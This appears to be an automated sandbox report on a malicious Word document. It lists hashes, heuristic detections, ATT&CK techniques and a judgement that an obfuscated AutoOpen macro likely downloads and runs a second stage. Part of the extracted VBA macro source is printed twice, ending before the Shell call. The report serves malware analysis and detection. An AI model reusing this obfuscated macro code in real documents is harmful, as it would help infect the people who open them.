Office (OLE) malware analysis — malicious · 2c18a11b05ef3c16

MALICIOUS

Office (OLE)

82.0 KB Created: 2017-10-16 11:13:00 Authoring application: Microsoft Office Word First seen: 2017-10-28

MD5: 19f792c3db3c4afb275b4ba9dad24a0c SHA-1: dd82eb798f84bd0a85da2dc7c72ea7bf751d0069 SHA-256: 2c18a11b05ef3c161f3b1da4b84d3b104353e4d83828d30620c6bfa5601346dc

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The macro is obfuscated but contains a Shell() call, indicating an attempt to execute arbitrary commands. This is further supported by the 'OLE_VBA_SHELL' and 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristic firings. The macro's intent is likely to download and execute a second-stage payload.

Heuristics 7

ClamAV: Doc.Macro.Obfuscation-6355576-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Macro.Obfuscation-6355576-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10708 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	10708 bytes
SHA-256: `83568b13e587622ef7c6f0d389604e8da23facd5eafcfa9e65aebf73f7e0ddd9`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Module1" Sub qZvtLQKqt() GzYcPqUsS = "I6GHLjjqHtmadzDLztSDiTjAYQjnVpwQtJiHcWtdKzDubpHaVSuNz5SAS0VONDL7S" ntwmCWWn = Mid(GzYcPqUsS, 4, 50) FhvHvZfd = ntwmCWWn cCjMpiKmwc = "IW2ANpVfJtrTBQAsDoVKkG109KMCE4BY8DE94IL3A F" vrsptisr = Mid(cCjMpiKmwc, 6, 16) KEmwdYYSDK = vrsptisr itUjtA = "8QL4PSPY6LTOLR76ZEKGJBbSwOidbjWhfzHUiKztWzpPqWzfDGwRwOQsODjuLOsUuSMFhBbZEQjMMLcZRC6HFYG2A0IL7XBF7CUG8" cmYJiT = Mid(itUjtA, 18, 64) KRQJocO = cmYJiT UiQkFjPv = "FCaUiEjRhPFfbFiIEUVXKrzBfYNhiEjCbKdIoYmpjuYSvvwzibIrpEPaF7T0NWVMJHPAPMI4D98P6JZ" sNmpaH = Mid(UiQkFjPv, 2, 56) djTci = sNmpaH GmsvNvmmE = "ViiCjhuphVYXEvFjHHWvNssprwTiEHvvdzftSiXOoVC08SOBUXIWTM6" nXaoD = Mid(GmsvNvmmE, 2, 40) LaHtYawUnBO = nXaoD FfMfoXIMjRb = "GBUEJCJMwkDhEaHrkdEMqoLnNPlaZduGQLQdkI96UES9QNR7D8YKA87" VzScbOHzk = Mid(FfMfoXIMjRb, 6, 33) odVmjnkEIZb = VzScbOHzk GmQtp = "TI14M0ZQV3MMS4SI1LEMHNFtKhzlqaSVNCuvAoOoBMcEirTZUDsUiWLYSbwD5GKO4SXTWH" MssGLBLzwsG = Mid(GmQtp, 20, 40) VIvjVWiEWzX = MssGLBLzwsG HEFWukt = "FXYoJrCndiDEQcaUfijoPSfGjaNzDvoNWvDDPkczhHvjsrhXHHcJJPzHZSEK6LFYJIITKIP2P1M1EZJ5MCXNPEE2" TzhWJcN = Mid(HEFWukt, 3, 57) ujMvYXX = TzhWJcN SwtjKbcEm = "LB4LQ5MHKS880EYR5Z06NIHlJAHiuzsVRwVjTVwjdAptjPpZiIIRDvjTmYUHUowdRclwFJnFZjQ8J7AR9O1I0MLY9HM1" tdpZAMriE = Mid(SwtjKbcEm, 23, 53) ICITMV = tdpZAMriE NHhHa = "K9TIWMPLDOFBKM0COQqjqPAUYRiWIUatMFNKBEUYN54PPDXEO" TUIaoHWIcbP = Mid(NHhHa, 17, 16) iHiSb = TUIaoHWIcbP rIJLPCBsO = "" + cnVVGns + aQfpiQk + iDwHv + SizlioO + CpzGvwTa + UAiiTKD + YbTrD + MnrVqYU + ObNqp + UljHVbH + GwUtfJ + uHzCn + "com" + "ments" + cnVVGns + aQfpiQk + iDwHv + SizlioO + CpzGvwTa + UAiiTKD + YbTrD + MnrVqYU + ObNqp + UljHVbH + GwUtfJ + uHzCn + DddCNQ + PDFTNiEq + khLFWlW + iovrUU + PkDOs nvwijwzPoHz = Left(Right((bpfPaNzVa(rIJLPCBsO)), Len((bpfPaNzVa(rIJLPCBsO))) - 5045), 31) aLzJT = Right(Left((bpfPaNzVa(rIJLPCBsO)), 2178), 43) LBzphcYVjTb = Right(Left((bpfPaNzVa(rIJLPCBsO)), 11850), 131) JmRiRJQwAd = Mid((bpfPaNzVa(rIJLPCBsO)), 13024, 5) iKhckJ = Mid((bpfPaNzVa(rIJLPCBsO)), 6858, 85) OmlwHB = Mid((bpfPaNzVa(rIJLPCBsO)), 4789, 40) cjUjosvn = Right(Left((bpfPaNzVa(rIJLPCBsO)), 7691), 85) sJKBLXL = Right(Left((bpfPaNzVa(rIJLPCBsO)), 9485), 140) SqsvK = Mid((bpfPaNzVa(rIJLPCBsO)), 3425, 144) XWAVbQCqWRI = Left(Right((bpfPaNzVa(rIJLPCBsO)), Len((bpfPaNzVa(rIJLPCBsO))) - 14128), 101) lOuiVRKD = Right(Left((bpfPaNzVa(rIJLPCBsO)), 6700), 144) Okiwpijn = Left(Right((bpfPaNzVa(rIJLPCBsO)), Len((bpfPaNzVa(rIJLPCBsO))) - 3084), 139) rUZmYnbH = Mid((bpfPaNzVa(rIJLPCBsO)), 13206, 79) uODFRDwKZ = Left(Right((bpfPaNzVa(rIJLPCBsO)), Len((bpfPaNzVa(rIJLPCBsO))) - 14798), 85) tKumkwRMHnd = Right(Left((bpfPaNzVa(rIJLPCBsO)), 14582), 118) fQpHJhpDj = Right(Left((bpfPaNzVa(rIJLPCBsO)), 9330), 144) zhZjlmZNR = Mid((bpfPaNzVa(rIJLPCBsO)), 983, 117) KiAoqKuLrQQ = Left(Right((bpfPaNzVa(rIJLPCBsO)), Len((bpfPaNzVa(rIJLPCBsO))) - 8721), 47) BOpArDtJ = Right(Left((bpfPaNzVa(rIJLPCBsO)), 10935), 149) mDXkbV = Left(Right((bpfPaNzVa(rIJLPCBsO)), Len((bpfPaNzVa(rIJLPCBsO))) - 15814), 106) hGhFKGV = Right(Left((bpfPaNzVa(rIJLPCBsO)), 10081), 66) IXqRjMAfX = Mid((bpfPaNzVa(rIJLPCBsO)), 12184, 115) VOioiRNk = Right(Left((bpfPaNzVa(rIJLPCBsO)), 6348), 37) TqiAiNrv = Left(Right((bpfPaNzVa(rIJLPCBsO)), Len((bpfPaNzVa(rIJLPCBsO))) - 10279), 36) iBXklkwDq = Mid((bpfPaNzVa(rIJLPCBsO)), 5634, 2) DZouS = Mid((bpfPaNzVa(rIJLPCBsO)), 14601, 53) WttkXGphMQA = Mid((bpfPaNzVa(rIJLPCBsO)), 9555, 17) kSNuUq = Right(Left((bpfPaNzVa(rIJLPCBsO)), 13892), 100) zUKuw = Right(Left((bpfPaNzVa(rIJLPCBsO)), 8357), 125) RpGQpwY = Right(Left((bpfPaNzVa(rIJLPCBsO)), 9877), 78) tdRvEYfCrO = Right(Left((bpfPaNzVa(rIJLPCBsO)), 2569), 100) LuZbaqYYi = Left(Right((bpfPaNzVa(rIJLPCBsO)), Len((bpfPaNzVa(rIJLPCBsO))) - 10418), 99) maQXKkJJ = Right(Lef ... (truncated)

SHA-256: 83568b13e587622ef7c6f0d389604e8da23facd5eafcfa9e65aebf73f7e0ddd9

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub qZvtLQKqt()
GzYcPqUsS = "I6GHLjjqHtmadzDLztSDiTjAYQjnVpwQtJiHcWtdKzDubpHaVSuNz5SAS0VONDL7S"
ntwmCWWn = Mid(GzYcPqUsS, 4, 50)
FhvHvZfd = ntwmCWWn
cCjMpiKmwc = "IW2ANpVfJtrTBQAsDoVKkG109KMCE4BY8DE94IL3A F"
vrsptisr = Mid(cCjMpiKmwc, 6, 16)
KEmwdYYSDK = vrsptisr
itUjtA = "8QL4PSPY6LTOLR76ZEKGJBbSwOidbjWhfzHUiKztWzpPqWzfDGwRwOQsODjuLOsUuSMFhBbZEQjMMLcZRC6HFYG2A0IL7XBF7CUG8"
cmYJiT = Mid(itUjtA, 18, 64)
KRQJocO = cmYJiT
UiQkFjPv = "FCaUiEjRhPFfbFiIEUVXKrzBfYNhiEjCbKdIoYmpjuYSvvwzibIrpEPaF7T0NWVMJHPAPMI4D98P6JZ"
sNmpaH = Mid(UiQkFjPv, 2, 56)
djTci = sNmpaH
GmsvNvmmE = "ViiCjhuphVYXEvFjHHWvNssprwTiEHvvdzftSiXOoVC08SOBUXIWTM6"
nXaoD = Mid(GmsvNvmmE, 2, 40)
LaHtYawUnBO = nXaoD
FfMfoXIMjRb = "GBUEJCJMwkDhEaHrkdEMqoLnNPlaZduGQLQdkI96UES9QNR7D8YKA87"
VzScbOHzk = Mid(FfMfoXIMjRb, 6, 33)
odVmjnkEIZb = VzScbOHzk
GmQtp = "TI14M0ZQV3MMS4SI1LEMHNFtKhzlqaSVNCuvAoOoBMcEirTZUDsUiWLYSbwD5GKO4SXTWH"
MssGLBLzwsG = Mid(GmQtp, 20, 40)
VIvjVWiEWzX = MssGLBLzwsG
HEFWukt = "FXYoJrCndiDEQcaUfijoPSfGjaNzDvoNWvDDPkczhHvjsrhXHHcJJPzHZSEK6LFYJIITKIP2P1M1EZJ5MCXNPEE2"
TzhWJcN = Mid(HEFWukt, 3, 57)
ujMvYXX = TzhWJcN
SwtjKbcEm = "LB4LQ5MHKS880EYR5Z06NIHlJAHiuzsVRwVjTVwjdAptjPpZiIIRDvjTmYUHUowdRclwFJnFZjQ8J7AR9O1I0MLY9HM1"
tdpZAMriE = Mid(SwtjKbcEm, 23, 53)
ICITMV = tdpZAMriE
NHhHa = "K9TIWMPLDOFBKM0COQqjqPAUYRiWIUatMFNKBEUYN54PPDXEO"
TUIaoHWIcbP = Mid(NHhHa, 17, 16)
iHiSb = TUIaoHWIcbP
rIJLPCBsO = "" + cnVVGns + aQfpiQk + iDwHv + SizlioO + CpzGvwTa + UAiiTKD + YbTrD + MnrVqYU + ObNqp + UljHVbH + GwUtfJ + uHzCn + "com" + "ments" + cnVVGns + aQfpiQk + iDwHv + SizlioO + CpzGvwTa + UAiiTKD + YbTrD + MnrVqYU + ObNqp + UljHVbH + GwUtfJ + uHzCn + DddCNQ + PDFTNiEq + khLFWlW + iovrUU + PkDOs
nvwijwzPoHz = Left(Right((bpfPaNzVa(rIJLPCBsO)), Len((bpfPaNzVa(rIJLPCBsO))) - 5045), 31)
aLzJT = Right(Left((bpfPaNzVa(rIJLPCBsO)), 2178), 43)
LBzphcYVjTb = Right(Left((bpfPaNzVa(rIJLPCBsO)), 11850), 131)
JmRiRJQwAd = Mid((bpfPaNzVa(rIJLPCBsO)), 13024, 5)
iKhckJ = Mid((bpfPaNzVa(rIJLPCBsO)), 6858, 85)
OmlwHB = Mid((bpfPaNzVa(rIJLPCBsO)), 4789, 40)
cjUjosvn = Right(Left((bpfPaNzVa(rIJLPCBsO)), 7691), 85)
sJKBLXL = Right(Left((bpfPaNzVa(rIJLPCBsO)), 9485), 140)
SqsvK = Mid((bpfPaNzVa(rIJLPCBsO)), 3425, 144)
XWAVbQCqWRI = Left(Right((bpfPaNzVa(rIJLPCBsO)), Len((bpfPaNzVa(rIJLPCBsO))) - 14128), 101)
lOuiVRKD = Right(Left((bpfPaNzVa(rIJLPCBsO)), 6700), 144)
Okiwpijn = Left(Right((bpfPaNzVa(rIJLPCBsO)), Len((bpfPaNzVa(rIJLPCBsO))) - 3084), 139)
rUZmYnbH = Mid((bpfPaNzVa(rIJLPCBsO)), 13206, 79)
uODFRDwKZ = Left(Right((bpfPaNzVa(rIJLPCBsO)), Len((bpfPaNzVa(rIJLPCBsO))) - 14798), 85)
tKumkwRMHnd = Right(Left((bpfPaNzVa(rIJLPCBsO)), 14582), 118)
fQpHJhpDj = Right(Left((bpfPaNzVa(rIJLPCBsO)), 9330), 144)
zhZjlmZNR = Mid((bpfPaNzVa(rIJLPCBsO)), 983, 117)
KiAoqKuLrQQ = Left(Right((bpfPaNzVa(rIJLPCBsO)), Len((bpfPaNzVa(rIJLPCBsO))) - 8721), 47)
BOpArDtJ = Right(Left((bpfPaNzVa(rIJLPCBsO)), 10935), 149)
mDXkbV = Left(Right((bpfPaNzVa(rIJLPCBsO)), Len((bpfPaNzVa(rIJLPCBsO))) - 15814), 106)
hGhFKGV = Right(Left((bpfPaNzVa(rIJLPCBsO)), 10081), 66)
IXqRjMAfX = Mid((bpfPaNzVa(rIJLPCBsO)), 12184, 115)
VOioiRNk = Right(Left((bpfPaNzVa(rIJLPCBsO)), 6348), 37)
TqiAiNrv = Left(Right((bpfPaNzVa(rIJLPCBsO)), Len((bpfPaNzVa(rIJLPCBsO))) - 10279), 36)
iBXklkwDq = Mid((bpfPaNzVa(rIJLPCBsO)), 5634, 2)
DZouS = Mid((bpfPaNzVa(rIJLPCBsO)), 14601, 53)
WttkXGphMQA = Mid((bpfPaNzVa(rIJLPCBsO)), 9555, 17)
kSNuUq = Right(Left((bpfPaNzVa(rIJLPCBsO)), 13892), 100)
zUKuw = Right(Left((bpfPaNzVa(rIJLPCBsO)), 8357), 125)
RpGQpwY = Right(Left((bpfPaNzVa(rIJLPCBsO)), 9877), 78)
tdRvEYfCrO = Right(Left((bpfPaNzVa(rIJLPCBsO)), 2569), 100)
LuZbaqYYi = Left(Right((bpfPaNzVa(rIJLPCBsO)), Len((bpfPaNzVa(rIJLPCBsO))) - 10418), 99)
maQXKkJJ = Right(Lef
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.